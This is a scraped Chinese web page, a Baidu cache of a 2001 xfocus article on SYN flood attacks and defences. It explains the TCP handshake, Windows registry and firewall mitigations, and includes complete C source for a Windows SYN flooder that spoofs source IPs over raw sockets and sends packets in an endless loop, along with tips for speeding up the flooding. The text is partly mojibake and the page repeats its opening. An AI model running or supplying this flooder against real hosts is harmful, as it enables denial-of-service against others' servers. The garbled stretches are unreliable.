中财网国旗下教师宣誓词:SYN Flood攻击的基本原理及防御
来源:百度文库 编辑:中财网 时间:2024/05/06 03:05:26
您查询的关键词是:ip_hdrincl
。如果打开速度慢,可以尝试快速版;如果想保存快照,可以添加到搜藏。
(百度和网页http://www.xfocus.net/articles/200106/208.html
的作者无关,不对其内容负责。百度快照谨为网络故障时之索引,不代表被搜索网站的即?
币趁妗?
-----------------------------------------------------------------------------
---
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 English Version
文章分类 专题文章 <<
漏洞分析
安全配置
黑客教学
编程技术
工具介绍
火墙技术
入侵检测
破解专题
焦点公告
焦点峰会 文章推荐 LSD RPC 溢出漏洞之分析
任意用户模式下执行 ring 0 代码
IIS的NSIISLOG.DLL溢出问题分析
SYN Flood攻击的基本原理及防御创建时间:2001-06-28
文章属性:转载
文章来源:http://shotgun.patching.net/syn.htm
文章提交:xundi (xundi_at_xfocus.org)Shotgun首发于天极网第一部分 SYN Flood的基本原理 SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS
(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP
连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 要明白这种攻击的基本原理,还是要从TCP连接建立的过程开始说起:大家都知道,TCP与UDP
不同,它是基于连接的,也就是说:为了在服务端和客户端之间传送TCP
数据,必须先建立一个虚拟电路,也就是TCP连接,建立TCP连接的标准过程是这样的:首先,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize
),同步报文会指明客户端使用的端口以及TCP连接的初始序号; 第二步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK
的报文,表示客户端的请求被接受,同时TCP序号被加一,ACK即确认(Acknowledgement
)。 第三步,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加一,到此一个
TCP连接完成。 以上的连接过程在TCP协议中被称为三次握手(Three-way Handshake)。 问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN
报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK
报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK
给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN
Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2
分钟);一个用户出现异常导致服务器的一个线程等待1
分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将?
宋ひ桓龇浅4蟮陌肓恿斜矶姆浅6嗟淖试?---数以万计的半连接,即使是简单
的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN
+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃-
--即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP
连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正?
?突У慕嵌瓤蠢矗衿魇ハ煊Γ庵智榭鑫颐浅谱鳎悍衿鞫耸艿搅薙YN Flood
攻击(SYN洪水攻击)。 从防御角度来说,有几种简单的解决方法,第一种是缩短SYN Timeout时间,由于SYN
Flood攻击的效果取决于服务器上保持的SYN半连接数,这个值=SYN攻击的频度 x SYN
Timeout,所以通过缩短从接收到SYN
报文到确定这个报文无效并丢弃改连接的时间,例如设置为20秒以下(过低的SYN
Timeout设置可能会影响客户的正常访问),可以成倍的降低服务器的负荷。 第二种方法是设置SYN Cookie,就是给每一个请求连接的IP地址分配一个Cookie
,如果短时间内连续受到某个IP的重复SYN报文,就认定是受到了攻击,以后从这个IP
地址来的包会被一概丢弃。 可是上述的两种方法只能对付比较原始的SYN Flood攻击,缩短SYN Timeout
时间仅在对方攻击频度不高的情况下生效,SYN Cookie更依赖于对方使用真实的IP
地址,如果攻击者以数万/秒的速度发送SYN报文,同时利用SOCK_RAW随机改写IP
报文中的源地址,以上的方法将毫无用武之地。 第二部份 SYN Flooder源码解读 下面我们来分析SYN Flooder的程序实现。首先,我们来看一下TCP报文的格式: 0 1 2 3 4 5 6 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IP首部 | TCP首部 | TCP数据段 |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 图一 TCP报文结构 如上图所示,一个TCP报文由三个部分构成:20字节的IP首部、20字节的TCP
首部与不定长的数据段,(实际操作时可能会有可选的IP选项,这种情况下TCP
首部向后顺延)由于我们只是发送一个SYN信号,并不传递任何数据,所以TCP
数据段为空。TCP首部的数据结构为: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 十六位源端口号 | 十六位目标端口号 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位序列号 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位确认号 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 四位 | |U|A|P|R|S|F| | | 首部 |六位保留位 |R|C|S|S|Y|I| 十六位窗口大小 | | 长度 | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 十六位校验和 | 十六位紧急指针 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 选项(若有) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 数据(若有) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 图二 TCP首部结构 根据TCP报文格式,我们定义一个结构TCP_HEADER用来存放TCP首部:typedef struct _tcphdr { USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度+6位保留字中的4位 unsigned char th_flag; //2位保留字+6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量}TCP_HEADER;通过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2(二进制的00000010
)我们能制造一个SYN的TCP报文,通过大量发送这个报文可以实现SYN Flood
的效果。但是为了进行IP欺骗从而隐藏自己,也为了躲避服务器的SYN Cookie
检查,还需要直接对IP首部进行操作:0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 版本 | 长度 | 八位服务类型 | 十六位总长度 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 十六位标识 | 标志| 十三位片偏移 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 八位生存时间 | 八位协议 | 十六位首部校验和 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位源IP地址 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 三十二位目的IP地址 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 选项(若有) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 数据 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 图三 IP首部结构同样定义一个IP_HEADER来存放IP首部typedef struct _iphdr{ unsigned char h_verlen; //4位首部长度+4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议号(TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址}IP_HEADER;然后通过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,
WSA_FLAG_OVERLAPPED)); 建立一个原始套接口,由于我们的IP源地址是伪造的,所以不能指望系统帮我们计算
IP校验和,我们得在在setsockopt中设置IP_HDRINCL告诉系统自己填充IP
首部并自己计算校验和: flag=TRUE; setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));IP校验和的计算方法是:首先将IP首部的校验和字段设为0(IP_HEADER.checksum=0),
然后计算整个IP首部(包括选项)的二进制反码的和,一个标准的校验和函数如下所示:USHORT checksum(USHORT *buffer, int size){ unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum);}这个函数并没有经过任何的优化,由于校验和函数是TCP/IP
协议中被调用最多函数之一,所以一般说来,在实现TCP/IP
栈时,会根据操作系统对校验和函数进行优化。TCP首部检验和与IP首部校验和的计算方法相同,在程序中使用同一个函数来计算。需要注意的是,由于TCP首部中不包含源地址与目标地址等信息,为了保证TCP
校验的有效性,在进行TCP校验和的计算时,需要增加一个TCP
伪首部的校验和,定义如下:struct { unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; //置空 char ptcl; //协议类型 unsigned short tcpl; //TCP长度}psd_header;然后我们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和:memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(
tcp_header));计算IP校验和的时候不需要包括TCP伪首部:memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(
tcp_header)); 再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就可以直接发送了: memcpy(SendBuf,&ip_header,sizeof(ip_header)); sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(
DestAddr)); 因为整个TCP
报文中的所有部分都是我们自己写入的(操作系统不会做任何干涉),所以我们可以在IP
首部中放置随机的源IP地址,如果伪造的源IP地址确实有人使用,他在接收到服务器的
SYN+ACK报文后会发送一个RST报文(标志位为00000100
),通知服务器端不需要等待一个无效的连接,可是如果这个伪造IP
并没有绑定在任何的主机上,不会有任何设备去通知主机该连接是无效的(这正是TCP
协议的缺陷),主机将不断重试直到SYN Timeout
时间后才能丢弃这个无效的半连接。所以当攻击者使用主机分布很稀疏的IP
地址段进行伪装IP的SYN Flood
攻击时,服务器主机承受的负荷会相当的高,根据测试,一台PIII 550MHz+128MB+
100Mbps的机器使用经过初步优化的SYN Flooder程序可以以16,000包/秒的速度发送TCP
SYN报文,这样的攻击力已经足以拖垮大部分WEB服务器了。 稍微动动脑筋我们就会发现,想对SYN Flooder
程序进行优化是很简单的,从程序构架来看,攻击时循环内的代码主要是进行校验和计算?
牖撼迩奶畛洌话愕乃悸肥翘岣咝Q楹图扑愕乃俣龋疑踔良没惚啻氡嘈吹男Q?
和函数,实际上,有另外一个变通的方法可以轻松实现优化而又不需要高深的编程技巧和?
е叮ɡ鲜邓蛋桑沂П冉喜?P),我们仔细研究了两个不同源地址的TCP SYN
报文后发现,两个报文的大部分字段相同(比如目的地址、协议等等),只有源地址和校?
楹筒煌ㄈ绻艘危炊丝谝部梢杂斜浠遣⒉挥跋煳颐撬惴ㄓ呕乃悸罚?
果我们事先计算好大量的源地址与校验和的对应关系表(如果其他的字段有变化也可以加?
胝飧霰恚燃扑阃瓯狭斯セ鞒绦蚓椭恍枰ゴ康淖楹匣撼迩⒎⑺停ㄓ弥刚肜粗苯硬僮?
缓冲区的特定位置,从事先计算好的对应关系表中读出数据,替换缓冲区相应字段),这?
旨虻サ墓ぷ魍耆【鲇谙低撤⑺虸P
包的速度,与程序的效率没有任何关系,这样,即使是CPU
主频较低的主机也能快速的发送大量TCP SYN
攻击包。如果考虑到缓冲区拼接的时间,甚至可以定义一个很大的缓冲区数组,填充完毕?
笤俜⑺停ǔジ庵址椒ㄏ肓艘桓龊芴械谋扔鳎夯鸺谧暗淙缓苈且坏┡诘?
膛了以后就可以连续猛烈地发射了:)。 第三部分 SYN Flood攻击的监测与防御初探 对于SYN Flood
攻击,目前尚没有很好的监测和防御方法,不过如果系统管理员熟悉攻击方法和系统架构?
ü幌盗械纳瓒ǎ材艽右欢ǔ潭壬辖档捅还セ飨低车母汉桑跚岣好娴挠跋臁#ㄕ庹?
是我撰写本文的主要目的) 一般来说,如果一个系统(或主机)负荷突然升高甚至失去响应,使用Netstat
命令能看到大量SYN_RCVD的半连接(数量>500或占总连接数的10
%以上),可以认定,这个系统(或主机)遭到了SYN Flood攻击。 遭到SYN Flood攻击后,首先要做的是取证,通过Netstat –n –p tcp >resault.
txt记录目前所有TCP连接状态是必要的,如果有嗅探器,或者TcpDump之类的工具,记录
TCP SYN报文的所有细节也有助于以后追查和防御,需要记录的字段有:源地址、IP
首部中的标识、TCP首部中的序列号、TTL
值等,这些信息虽然很可能是攻击者伪造的,但是用来分析攻击者的心理状态和攻击程序?
膊晃薨镏L乇鹗荰TL值,如果大量的攻击包似乎来自不同的IP但是TTL
值却相同,我们往往能推断出攻击者与我们之间的路由器距离,至少也可以通过过滤特定
TTL值的报文降低被攻击系统的负荷(在这种情况下TTL
值与攻击报文不同的用户就可以恢复正常访问) 前面曾经提到可以通过缩短SYN Timeout时间和设置SYN Cookie来进行SYN
攻击保护,对于Win2000系统,还可以通过修改注册表降低SYN Flood
的危害,在注册表中作如下改动:首先,打开regedit,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
Tcpip\Parameters 增加一个SynAttackProtect的键值,类型为REG_DWORD,取值范围是0-2
,这个值决定了系统受到SYN攻击时采取的保护措施,包括减少系统SYN+ACK
的重试的次数等,默认值是0(没有任何保护措施),推荐设置是2; 增加一个TcpMaxHalfOpen的键值,类型为REG_DWORD,取值范围是100-0xFFFF
,这个值是系统允许同时打开的半连接,默认情况下WIN2K PRO和SERVER是100,
ADVANCED SERVER是500,这个值很难确定,取决于服务器TCP
负荷的状况和可能受到的攻击强度,具体的值需要经过试验才能决定。 增加一个TcpMaxHalfOpenRetried的键值,类型为REG_DWORD,取值范围是80-0xFFFF
,默认情况下WIN2K PRO和SERVER是80,ADVANCED SERVER是400
,这个值决定了在什么情况下系统会打开SYN攻击保护。 我们来分析一下Win2000的SYN攻击保护机制:正常情况下,Win2K对TCP
连接的三次握手有一个常规的设置,包括SYN Timeout时间、SYN-ACK的重试次数和SYN
报文从路由器到系统再到Winsock
的延时等,这个常规设置是针对系统性能进行优化的(安全和性能往往相互矛盾)所以可?
愿没峁┓奖憧旖莸姆瘢灰坏┓衿魇艿焦セ鳎琒YN半连接的数量超过
TcpMaxHalfOpenRetried的设置,系统会认为自己受到了SYN Flood攻击,此时设置在
SynAttackProtect键值中的选项开始作用,SYN Timeout时间被减短,SYN-ACK
的重试次数减少,系统也会自动对缓冲区中的报文进行延时,避免对TCP/IP
堆栈造成过大的冲击,力图将攻击危害减到最低;如果攻击强度不断增大,超过了
TcpMaxHalfOpen
值,此时系统已经不能提供正常的服务了,更重要的是保证系统不会崩溃,所以系统将会?
魏纬鯰cpMaxHalfOpen值范围的SYN
报文(应该是使用随机丢包策略),保证系统的稳定性。 所以,对于需要进行SYN
攻击保护的系统,我们可以测试/预测一下访问峰值时期的半连接打开量,以其作为参考设
定TcpMaxHalfOpenRetried的值(保留一定的余量),然后再以TcpMaxHalfOpenRetried的
1.25倍作为TcpMaxHalfOpen值,这样可以最大限度地发挥WIN2K自身的SYN攻击保护机制。 通过设置注册表防御SYN Flood
攻击,采用的是“挨打”的策略,无论系统如何强大,始终不能光靠挨打支撑下去,除了?
ご蛑猓巴巳谩币彩且恢直冉嫌行У姆椒ā? 退让策略是基于SYN Flood攻击代码的一个缺陷,我们重新来分析一下SYN Flood
攻击者的流程:SYN Flood程序有两种攻击方式,基于IP
的和基于域名的,前者是攻击者自己进行域名解析并将IP
地址传递给攻击程序,后者是攻击程序自动进行域名解析,但是它们有一点是相同的,就?
且坏┕セ骺迹换嵩俳杏蛎馕觯颐堑那腥氲阏钦饫铮杭偕枰惶ǚ衿髟谑艿?
SYN Flood攻击后迅速更换自己的IP地址,那么攻击者仍在不断攻击的只是一个空的IP
地址,并没有任何主机,而防御方只要将DNS解析更改到新的IP
地址就能在很短的时间内(取决于DNS
的刷新时间)恢复用户通过域名进行的正常访问。为了迷惑攻击者,我们甚至可以放置一?
ā拔狈衿魅霉セ髡呗阌诠セ鞯摹靶Ч保ㄓ捎贒NS
缓冲的原因,只要攻击者的浏览器不重起,他访问的仍然是原先的IP地址)。 同样的原因,在众多的负载均衡架构中,基于DNS解析的负载均衡本身就拥有对SYN
Flood的免疫力,基于DNS解析的负载均衡能将用户的请求分配到不同IP
的服务器主机上,攻击者攻击的永远只是其中一台服务器,虽然说攻击者也能不断去进行
DNS请求从而打破这种“退让”策略,但是一来这样增加了攻击者的成本,二来过多的DNS
请求可以帮助我们追查攻击者的真正踪迹(DNS请求不同于SYN
攻击,是需要返回数据的,所以很难进行IP伪装)。 对于防火墙来说,防御SYN Flood
攻击的方法取决于防火墙工作的基本原理,一般说来,防火墙可以工作在TCP层之上或IP
层之下,工作在TCP
层之上的防火墙称为网关型防火墙,网关型防火墙与服务器、客户机之间的关系如下图所?
荆? 外部TCP连接 内部TCP连接 [客户机] =================>[防火墙] =================>[服务器] 如上图所示,客户机与服务器之间并没有真正的TCP
连接,客户机与服务器之间的所有数据交换都是通过防火墙代理的,外部的DNS
解析也同样指向防火墙,所以如果网站被攻击,真正受到攻击的是防火墙,这种防火墙的?
诺闶俏榷ㄐ院茫勾蚧髂芰η浚且蛭械腡CP
报文都需要经过防火墙转发,所以效率比较低由于客户机并不直接与服务器建立连接,在
TCP连接没有完成时防火墙不会去向后台的服务器建立新的TCP
连接,所以攻击者无法越过防火墙直接攻击后台服务器,只要防火墙本身做的足够强壮,?
庵旨芄箍梢缘挚瓜嗟鼻慷鹊腟YN Flood攻击。但是由于防火墙实际建立的TCP
连接数为用户连接数的两倍(防火墙两端都需要建立TCP
连接),同时又代理了所有的来自客户端的TCP
请求和数据传送,在系统访问量较大时,防火墙自身的负荷会比较高,所以这种架构并不?
苁视糜诖笮屯尽#ㄎ腋芯酰杂谡庋姆阑鹎郊芄梗褂肨CP_STATE
攻击估计会相当有效:) 工作在IP层或IP
层之下的防火墙(路由型防火墙)工作原理有所不同,它与服务器、客户机的关系如下图?
荆?[防火墙] 数据包修改转发 [客户机]========|=======================>[服务器] TCP连接 客户机直接与服务器进行TCP
连接,防火墙起的是路由器的作用,它截获所有通过的包并进行过滤,通过过滤的包被转?
⒏衿鳎獠康腄NS解析也直接指向服务器,这种防火墙的优点是效率高,可以适应
100Mbps-1Gbps
的流量,但是这种防火墙如果配置不当,不仅可以让攻击者越过防火墙直接攻击内部服务?
鳎踔劣锌赡芊糯蠊セ鞯那慷龋贾抡鱿低潮览!?
在这两种基本模型之外,有一种新的防火墙模型,我个人认为还是比较巧妙的,它集中了?
街址阑鹎降挠攀疲庵址阑鹎降墓ぷ髟砣缦滤荆?第一阶段,客户机请求与防火墙建立连接: SYN SYN+ACK ACK [客户机]---- >[防火墙] => [防火墙]-------- >[客户机] => [客户机]-
-- >[防火墙] 第二阶段,防火墙伪装成客户机与后台的服务器建立连接 [防火墙]< =========== >[服务器] TCP连接 第三阶段,之后所有从客户机来的TCP报文防火墙都直接转发给后台的服务器 防火墙转发 [客户机]< ======|======= >[服务器] TCP连接 这种结构吸取了上两种防火墙的优点,既能完全控制所有的SYN
报文,又不需要对所有的TCP数据报文进行代理,是一种两全其美的方法。 近来,国外和国内的一些防火墙厂商开始研究带宽控制技术,如果能真正做到严格控制、?
峙浯恚湍芎艽蟪潭壬戏烙蠖嗍木芫窆セ鳎颐腔故鞘媚恳源伞? 附录:Win2000下的SYN Flood程序改编自Linux下Zakath编写的SYN Flooder编译环境:VC++6.0,编译时需要包含ws2_32.lib//////////////////////////////////////////////////////////////////////////// //// SYN Flooder For Win2K by Shotgun //// //// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath //// THANX Lion Hook FOR PROGRAM OPTIMIZATION //// //// Released: [2001.4] //// Author: [Shotgun] //// Homepage: //// [http://IT.Xici.Net] //// [http://WWW.Patching.Net] //// ////////////////////////////////////////////////////////////////////////////#include#include #include #include #define SEQ 0x28376839#define SYN_DEST_IP "192.168.15.250"//被攻击的IP#define FAKE_IP "10.168.150.1" //伪装IP的起始值,本程序的伪装IP覆盖一个B
类网段#define STATUS_FAILED 0xFFFF //错误返回值 typedef struct _iphdr //定义IP首部{ unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址}IP_HEADER; struct //定义TCP伪首部{ unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; char ptcl; //协议类型 unsigned short tcpl; //TCP长度}psd_header; typedef struct _tcphdr //定义TCP首部{ USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度/6位保留字 unsigned char th_flag; //6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量}TCP_HEADER; //CheckSum:计算校验和的子函数USHORT checksum(USHORT *buffer, int size){ unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum);} // SynFlood主函数int main(){ int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; int TimeOut=2000,SendSEQ=0; char SendBuf[128]={0}; char RecvBuf[65535]={0}; WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; IP_HEADER ip_header; TCP_HEADER tcp_header; //初始化SOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); ExitProcess(STATUS_FAILED); } SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)
);if (SockRaw==INVALID_SOCKET){ fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } flag=TRUE; //设置IP_HDRINCL以自己填充IP首部 ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(
int));If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); __try{ //设置发送超时 ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,
sizeof(TimeOut));if(ErrorCode==SOCKET_ERROR){ fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError(
)); __leave; } memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); FakeIpNet=inet_addr(FAKE_IP); FakeIpHost=ntohl(FakeIpNet); //填充IP首部 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));//高四位IP版本号,低四位首部长度 ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
//16位总长度(字节) ip_header.ident=1
; //16位标识 ip_header.frag_and_flags=0
; //3位标志位 ip_header.ttl=128
; //8位生存时间TTL ip_header.proto=IPPROTO_TCP;
//8位协议(TCP,UDP…) ip_header.checksum=0
; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ)
; //32位源IP地址 ip_header.destIP=inet_addr(SYN_DEST_IP)
; //32位目的IP地址 //填充TCP首部 tcp_header.th_sport=htons(7000);
//源端口号 tcp_header.th_dport=htons(8080);
//目的端口号 tcp_header.th_seq=htonl(SEQ+SendSEQ)
; //SYN序列号 tcp_header.th_ack=0;
//ACK序列号置为0 tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0)
; //TCP长度和保留位 tcp_header.th_flag=2
; //SYN 标志 tcp_header.th_win=htons(16384)
; //窗口大小 tcp_header.th_urp=0;
//偏移 tcp_header.th_sum=0;
//校验和 //填充TCP伪首部(用于计算校验和,并不真正发送) psd_header.saddr=ip_header.sourceIP
; //源地址 psd_header.daddr=ip_header.destIP
; //目的地址 psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP
; //协议类型 psd_header.tcpl=htons(sizeof(tcp_header))
; //TCP首部长度 while(1) { //每发送10,240个报文输出一个标示符 printf("."); for(counter=0;counter<10240;counter++){ if(SendSEQ++==65536) SendSEQ=1
; //序列号循环 //更改IP首部 ip_header.checksum=0
; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ)
; //32位源IP地址 //更改TCP首部 tcp_header.th_seq=htonl(SEQ+SendSEQ)
; //SYN序列号 tcp_header.th_sum=0;
//校验和 //更改TCP Pseudo Header psd_header.saddr=ip_header.sourceIP; //计算TCP校验和,计算校验和时需要包括TCP pseudo header memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(
tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header
)+sizeof(tcp_header)); //计算IP校验和 memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header
)); memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); datasize=sizeof(ip_header)+sizeof(tcp_header); ip_header.checksum=checksum((USHORT *)SendBuf,datasize); //填充发送缓冲区 memcpy(SendBuf,&ip_header,sizeof(ip_header)); //发送TCP报文 ErrorCode=sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr*) &DestAddr, sizeof(DestAddr));if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); }//End of for }//End of While }//End of try __finally { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0;} Copyright ? 1998-2003 XFOCUS Team. All Rights Reserved
。如果打开速度慢,可以尝试快速版;如果想保存快照,可以添加到搜藏。
(百度和网页http://www.xfocus.net/articles/200106/208.html
的作者无关,不对其内容负责。百度快照谨为网络故障时之索引,不代表被搜索网站的即?
币趁妗?
-----------------------------------------------------------------------------
---
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 English Version
文章分类 专题文章 <<
漏洞分析
安全配置
黑客教学
编程技术
工具介绍
火墙技术
入侵检测
破解专题
焦点公告
焦点峰会 文章推荐 LSD RPC 溢出漏洞之分析
任意用户模式下执行 ring 0 代码
IIS的NSIISLOG.DLL溢出问题分析
SYN Flood攻击的基本原理及防御创建时间:2001-06-28
文章属性:转载
文章来源:http://shotgun.patching.net/syn.htm
文章提交:xundi (xundi_at_xfocus.org)Shotgun首发于天极网第一部分 SYN Flood的基本原理 SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS
(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP
连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 要明白这种攻击的基本原理,还是要从TCP连接建立的过程开始说起:大家都知道,TCP与UDP
不同,它是基于连接的,也就是说:为了在服务端和客户端之间传送TCP
数据,必须先建立一个虚拟电路,也就是TCP连接,建立TCP连接的标准过程是这样的:首先,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize
),同步报文会指明客户端使用的端口以及TCP连接的初始序号; 第二步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK
的报文,表示客户端的请求被接受,同时TCP序号被加一,ACK即确认(Acknowledgement
)。 第三步,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加一,到此一个
